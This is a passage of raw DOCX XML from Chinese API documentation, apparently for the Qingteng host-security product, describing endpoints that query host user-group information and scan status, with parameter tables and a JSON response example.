          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62F49C57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1E95F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4AA2F7D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB653DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39BC5A78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E779E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="103B3668" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6909E411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="系统账号信息查询扫描状态"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:t>系统账号信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7F4388" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询系统账号信息的扫描状态；具体请求方式参照3.1。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E8CB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="用户组信息"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用户组信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C789622" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用于查询系统用户组，将按每台主机每个用户组展示；每个用户组均提供其包含的用户，但仅包含用户名；每条数据均包含主机信息，您可以灵活的使用该接口组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0924476F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD51FD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该功能API用于查询资产中的用户组信息，获取查询的结果并展示；每条数据均包含主机信息，您可以灵活的使用该API组合出任何需要的显示结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32CBD3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>功能使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC24641" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>用户组信息查询有两种方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610DF4F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接获取当前信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7BA143" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>更新数据后，再获取最新信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E67901" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>为了满足上述功能，我们提供了三个接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD0A55" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>用户组信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742392C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>用户组信息扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297FBBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>用户组信息查询扫描状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA168AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>使用方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A39F868" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>直接查询当前信息则直接调用用户组信息查询结果接口（即1号接口）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBB148"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7ECCE89A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>接口的调用方法、参数和返回信息等具体如下所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160446CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="用户组信息查询结果"/>
      <w:r>
        <w:t>用户组信息查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1CB47C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于查询用户组信息，按每台主机每个用户组进行展示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1144D19E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182A4257" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/api/assets/accountgroup/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FAFF7"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173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="2530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="521F0B5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E4E5E97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8F81C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7173C0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E724DCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04F849DF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C02AAA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D58816F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="276A59D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="360550C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="59BD6807" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44369B3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DEE924E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="446FB30C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C349ED1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79A04491" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524CC5E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66514EAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5843B37C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3849932F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7A6877CE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14736E5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B5D6051" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3844D34D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="436AFC93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="420B8928" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14C902F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E836B35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B4DA46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F267962" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05C85F65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F99943A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D866F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75F2C8CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E0E4DB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组id（仅支持linux）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7300472E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7B754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/accountgroup/linux?agentId=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F010906" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C42098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId":"70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp":"172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId":39,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "hostTagList":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "test-test000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "tmp"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname":"qingteng",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "gid":4,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "name":"adm",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description":null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "members":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name":"qt",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "type":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name":"syslog",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "type":null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102332E6"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="3422"/>
        <w:gridCol w:w="4312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="457BAE7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1646691" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73BF8750" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15B70293" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28EA7448" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55EE40FB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34E01F69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1521CA60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5D8670" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AFB4E0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C41D055" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303FCB7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A6DEF8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="068B9ABD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34BC0613" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="239A2453" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73E22704" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45FFB200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D5C730D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EB6BDBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
